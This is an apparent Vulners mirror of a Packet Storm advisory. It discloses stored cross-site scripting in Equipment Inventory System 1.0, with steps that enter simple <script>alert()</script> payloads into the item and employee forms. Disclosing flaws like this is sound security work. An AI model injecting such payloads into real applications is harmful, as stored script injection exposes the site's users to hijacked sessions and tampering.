Lucene search
K

Equipment Inventory System 1.0 Cross Site Scripting

🗓️ 29 Mar 2021 00:00:00Reported by Jitendra Kumar TripathiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 276 Views

Equipment Inventory System 1.0 Cross Site Scripting exploit affecting Item List, Employee Management, and Employee Position field

Code
`# Exploit Title: Equipment Inventory System 1.0 - 'multiple' Stored XSS  
# Exploit Author: Jitendra Kumar Tripathi  
# Vendor Homepage: https://www.sourcecodester.com/php/11327/equipment-inventory.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=11327&title=Equipment+Inventory+System+using+PHP+with+Source+Code  
# Version: 1  
# Tested on Windows 10 + Xampp 8.0.3  
  
Vulnerable Parameters: Item List , Employee Details , Position of Employee  
  
*Steps to reproduce:*  
1: Log in with a valid username and password.   
  
2: Navigate to http://localhost/deped/admin/item.php  
Add Item   
Payload : <script>alert(1)</script>  
  
Navigate to http://localhost/deped/admin/employee.php  
Add Employee  
Payload : <script>alert(2)</script>  
  
Post Saved Sucessfully , reload your page or navigate to any page you will see these XSS triggered.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation